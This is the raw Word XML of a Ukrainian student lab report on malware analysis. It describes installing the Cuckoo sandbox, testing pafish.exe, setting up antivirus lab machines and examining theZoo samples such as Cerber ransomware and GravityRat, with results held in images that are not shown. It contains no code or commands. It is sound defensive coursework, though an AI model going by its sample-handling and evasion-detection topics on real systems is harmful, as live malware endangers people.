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63B7A" w14:textId="77777777" w:rsidR="00A508E9" w:rsidRDefault="00A508E9" w:rsidP="00A508E9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7B47">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>ЗВОРОТНА РОЗРОБКА ТА АНАЛIЗ ШКIДЛИВОГО ПРОГРАМНОГО ЗАБЕЗПЕЧЕННЯ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61149594" w14:textId="57A4F011" w:rsidR="00A508E9" w:rsidRPr="00F21F95" w:rsidRDefault="00A508E9" w:rsidP="00A508E9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0453">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Лабораторна робота №</w:t>
      </w:r>
      <w:r w:rsidR="00F21F95">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20177E16" w14:textId="77777777" w:rsidR="00A508E9" w:rsidRDefault="00A508E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="21EA4512" w14:textId="342251F4" w:rsidR="00194F5C" w:rsidRDefault="00194F5C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38198A74" w14:textId="77777777" w:rsidR="00194F5C" w:rsidRDefault="00194F5C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D67372A" w14:textId="2231FA7E" w:rsidR="00306924" w:rsidRDefault="002D02A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D02A3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Протестуйте pafish.exe (роздiл 3.3.3) у Cuckoo (роздiл 3.3.1). Порiвняйте результати з прямим запуском у вiртуальнiй машинi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72637363" w14:textId="1523E837" w:rsidR="006D2103" w:rsidRPr="00795F5C" w:rsidRDefault="006D2103">
      <w:r w:rsidRPr="006D2103">
        <w:t xml:space="preserve">встановимо </w:t>
      </w:r>
      <w:r w:rsidRPr="006D2103">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cuckoo</w:t>
      </w:r>
      <w:r w:rsidRPr="00795F5C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AED097" w14:textId="77777777" w:rsidR="006D2103" w:rsidRPr="00795F5C" w:rsidRDefault="00795F5C" w:rsidP="006D2103">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/ForeGuards/Cuckoo-Installation-Guide/blob/main/installation.txt" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com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ForeGuards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Cuckoo</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Installation</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Guide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blob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main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installation</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D903D48" w14:textId="0484E742" w:rsidR="006D2103" w:rsidRPr="00795F5C" w:rsidRDefault="00795F5C" w:rsidP="006D2103">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://gohost.kz/blog/vps/ustanovka-mongodb-v-ubunt</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">u-22-04/" \l "%D0%A7%D0%B0%D1%81%D1%82%D1%8C_%D0%BF%D0%B5%D1%80%D0%B2%D0%B0%D1%8F_%D1%83%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B0_MongoDB" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gohost</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kz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blog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vps</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ustanovka</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mongodb</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>-22-04/#%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A</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>7%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1%81%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1%82%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</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>_%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BF</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>5%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1%80%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</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>2%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</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>_%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1%83%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1%81%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1%82%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BD</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>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BE</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>2%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BA</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>0%</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="00795F5C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
        </w:rPr>
        <w:t>0_</w:t>
      </w:r>
      <w:r w:rsidR="006D2103" w:rsidRPr="006D2103">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4ECF9" w14:textId="4A25E7F4" w:rsidR="006D2103" w:rsidRPr="006D2103" w:rsidRDefault="006D2103">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D2103">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B406AD6" wp14:editId="282E5948">
            <wp:extent cx="5940425" cy="31762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B3ED" w14:textId="26EB70BE" w:rsidR="0051298D" w:rsidRDefault="0051298D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Результат запуску:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3150ECD6" w14:textId="4C935EE2" w:rsidR="0051298D" w:rsidRDefault="0051298D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051298D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="292156E1" wp14:editId="2E0695D8">
            <wp:extent cx="5940425" cy="37122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DD6A" w14:textId="70201BFB" w:rsidR="008C08F8" w:rsidRDefault="008C08F8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cuckoo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE6DE3" w14:textId="343E5A03" w:rsidR="008C08F8" w:rsidRPr="008C08F8" w:rsidRDefault="00071B43">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071B43">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="570FF5B6" wp14:editId="1A52320B">
            <wp:extent cx="4058216" cy="1390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A42B" w14:textId="79233F35" w:rsidR="0051298D" w:rsidRDefault="0051298D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583CC29F" w14:textId="067FB277" w:rsidR="0051298D" w:rsidRPr="0051298D" w:rsidRDefault="0051298D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051298D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Розгорнiть лабораторiю з роздiлу 3.3.2 з 2-3 антивiрусами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5ECB1E" w14:textId="5A13084F" w:rsidR="00CA56AC" w:rsidRDefault="00CA56AC">
      <w:r w:rsidRPr="00CA56AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16582F6C" wp14:editId="03106A47">
            <wp:extent cx="3528060" cy="21560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505" cy="215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E5FC" w14:textId="109083E0" w:rsidR="00CA56AC" w:rsidRDefault="00CA56AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA56AC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Дослiдiть 3-5 зразкiв з theZoo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131FE632" w14:textId="1B09AB1E" w:rsidR="00611749" w:rsidRPr="00D440F1" w:rsidRDefault="00611749">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="009A3601">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:r w:rsidR="009A3601" w:rsidRPr="00D440F1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A3601">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cerber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF64BE7" w14:textId="4F317743" w:rsidR="009A3601" w:rsidRDefault="00920872">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00920872">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="451433C3" wp14:editId="006C20C3">
            <wp:extent cx="5940425" cy="2479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6CFD" w14:textId="31D17B50" w:rsidR="00D440F1" w:rsidRDefault="00920872">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00920872">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C904C1F" wp14:editId="1F66AB71">
            <wp:extent cx="5940425" cy="2085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7784" w14:textId="77777777" w:rsidR="00920872" w:rsidRDefault="00920872">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705B0897" w14:textId="6088DE0B" w:rsidR="00D440F1" w:rsidRDefault="00D440F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidR="00F21F95">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bat.skull</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBB2F59" w14:textId="0B7318B3" w:rsidR="00F21F95" w:rsidRDefault="00920872">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00920872">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59874DCA" wp14:editId="12AFDC4B">
            <wp:extent cx="5940425" cy="24422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4915" w14:textId="66DA2271" w:rsidR="00D440F1" w:rsidRDefault="00D440F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trojan.covter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5968297B" w14:textId="7C85ED19" w:rsidR="00D440F1" w:rsidRDefault="00920872">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00920872">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19533B27" wp14:editId="2974AFB8">
            <wp:extent cx="5940425" cy="21488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CE52" w14:textId="77777777" w:rsidR="00920872" w:rsidRDefault="00920872">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E5774CF" w14:textId="5AA4D267" w:rsidR="00D440F1" w:rsidRDefault="00D440F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630EBE4F" w14:textId="27D05217" w:rsidR="00D440F1" w:rsidRDefault="00D440F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4)Win32.GravityRat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E321F67" w14:textId="0E9CC8CE" w:rsidR="008E543C" w:rsidRDefault="00920872">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00920872">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6398A6E9" wp14:editId="62CA86A8">
            <wp:extent cx="5940425" cy="22345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E591" w14:textId="5934B388" w:rsidR="008E543C" w:rsidRDefault="008E543C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C50684" w14:textId="3ECE835A" w:rsidR="008E543C" w:rsidRPr="008E543C" w:rsidRDefault="008E543C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E543C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kaspersky </w:t>
      </w:r>
      <w:r w:rsidRPr="008E543C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>одразу видаляє файли</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> після їх вилучення з архіву, окрім</w:t>
      </w:r>
      <w:r w:rsidRPr="008E543C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E543C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trivial.html.883</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE3806C" w14:textId="1391E093" w:rsidR="002D473C" w:rsidRDefault="002D473C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D473C">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3175CB29" wp14:editId="5A597C9D">
            <wp:extent cx="3604260" cy="18343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720" cy="18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28D0" w14:textId="3DA3FEA9" w:rsidR="008E543C" w:rsidRPr="008E543C" w:rsidRDefault="008E543C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E543C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Він</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> має такий вигляд після запуску, я не помітив ніяких змін після цього</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A87AB3" w14:textId="576D5F27" w:rsidR="002D473C" w:rsidRDefault="002D473C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D473C">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75B0F161" wp14:editId="24BC6FF1">
            <wp:extent cx="5940425" cy="2853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3921" w14:textId="3365F30E" w:rsidR="008E543C" w:rsidRPr="008E543C" w:rsidRDefault="008E543C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E543C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">З </w:t>
      </w:r>
      <w:r w:rsidRPr="008E543C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">avast </w:t>
      </w:r>
      <w:r w:rsidRPr="008E543C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ситуація аналогічна</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763AC8D6" w14:textId="67229CD6" w:rsidR="008E543C" w:rsidRDefault="008E543C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E543C">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D5ACF25" wp14:editId="395C5859">
            <wp:extent cx="2179320" cy="28266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2554" cy="28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6FA" w14:textId="5C72549B" w:rsidR="008E543C" w:rsidRDefault="008E543C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E543C">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6512DF1B" wp14:editId="35D54FFC">
            <wp:extent cx="5940425" cy="2988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447E" w14:textId="7D0196D6" w:rsidR="0024728F" w:rsidRPr="00717B65" w:rsidRDefault="0024728F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Реал</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>зуйте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мовою</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> C/C++ </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>детектування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середовища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анал</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
